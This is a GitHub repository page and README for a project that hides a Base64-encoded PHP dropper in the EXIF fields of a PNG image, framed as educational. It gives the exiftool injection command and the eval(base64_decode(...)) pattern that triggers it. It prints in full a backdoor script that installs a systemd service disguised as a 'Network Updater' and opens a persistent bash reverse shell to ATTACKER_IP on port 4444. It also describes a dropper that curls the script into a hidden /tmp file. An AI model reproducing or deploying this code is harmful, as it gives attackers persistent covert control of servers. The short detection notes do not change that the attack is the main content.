https://github.com/backdoorali/backdoor-stealth-image-injection
Showcasing how uploaded images can be EXIF-injected with payloads to further compromise servers, in this specific case, by stealthily installing a backdoor.
https://github.com/backdoorali/backdoor-stealth-image-injection
cybersecurity-education educational-project exif exif-data-extraction exif-metadata image-manipulation malware-research offensive-security payload persistence php-backdoor reverse-shell steganography
Last synced: 14 days ago
JSON representation
Showcasing how uploaded images can be EXIF-injected with payloads to further compromise servers, in this specific case, by stealthily installing a backdoor.
- Host: GitHub
- URL: https://github.com/backdoorali/backdoor-stealth-image-injection
- Owner: BackdoorAli
- License: other
- Created: 2025-06-04T21:40:12.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2026-01-20T20:33:03.000Z (6 months ago)
- Last Synced: 2026-01-21T05:33:26.883Z (6 months ago)
- Topics: cybersecurity-education, educational-project, exif, exif-data-extraction, exif-metadata, image-manipulation, malware-research, offensive-security, payload, persistence, php-backdoor, reverse-shell, steganography
- Language: Shell
- Homepage:
- Size: 906 KB
- Stars: 1
- Watchers: 0
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
## Overview
This project demonstrates how attackers can embed a Base64-encoded malicious payload inside the EXIF metadata of a valid `.png` image. Once uploaded to a vulnerable server, the image can trigger remote command execution or download further malware.
This educational repository simulates:
- A valid `stealth_shell.png` with hidden malware in its EXIF fields.
- A PHP dropper payload (`base64_php_payload.txt`) that retrieves and executes a persistent backdoor.
- A malicious `shell.sh` that sets up a systemd-based reverse shell.
Author: [BackdoorAli](https://github.com/BackdoorAli)
> For educational purposes only. Do not deploy in production or unethical environments.
---
## Files Included
| File | Description |
|-------------------------|-------------|
| `stealth_shell.png` | Image containing the Base64-encoded PHP payload injected into EXIF fields |
| `base64_php_payload.txt`| The actual Base64-encoded dropper PHP payload |
| `shell.sh` | Systemd-based reverse shell that gets downloaded and executed |
---
## How the Attack Works
1. Image Creation
- A valid `.png` image is prepared (e.g., a portrait of myself for this specific project - refer to my GitHub's pfp).
2. Payload Preparation
- A PHP payload is written that:
- Uses `curl` to download `shell.sh`.
- Saves it to `/tmp/.m`.
- Makes it executable and runs it in the background.
3. EXIF Injection
- The Base64-encoded PHP is injected into `Comment`, `UserComment`, and `Software` EXIF fields using `exiftool`:
```bash
exiftool \
-Comment="$(cat base64_php_payload.txt)" \
-UserComment="$(cat base64_php_payload.txt)" \
-Software="$(cat base64_php_payload.txt)" \
stealth_shell.png
```
4. Execution (Hypothetical)
- If a vulnerable backend server extracts the EXIF metadata and passes it to something like:
```php
eval(base64_decode($image_exif_data['Comment']));
```
- Then the PHP dropper is executed, downloads the backdoor, and grants persistent shell access.
---
## Backdoor (`shell.sh`)
This script creates a persistent systemd service that launches a reverse shell to an attacker's machine.
```bash
#!/bin/bash
SERVICE_NAME="system-netupd"
SHELL_CMD="/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
cat < /etc/systemd/system/$SERVICE_NAME.service
[Unit]
Description=Network Updater (Critical)
After=network.target
[Service]
ExecStart=$SHELL_CMD
Restart=always
Type=simple
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reexec
systemctl daemon-reload
systemctl enable $SERVICE_NAME
systemctl start $SERVICE_NAME
```
Replace `ATTACKER_IP` with your actual listener IP/port. >>> AGAIN, hypothetically! <<<
---
## Detection & Extraction
To view the injected payload:
```bash
exiftool stealth_shell.png | grep -i comment
```
To decode:
```bash
echo "" | base64 -d
```
---
## Defensive measures
See `defense.md` for detailed strategies on detecting and preventing EXIF-based malware delivery.
---
## Disclaimer
This project is for educational and research purposes only. Unauthorised deployment, testing, or use of this payload outside of a legal lab or your own system is strictly prohibited and of YOUR OWN RESPONSIBILITY.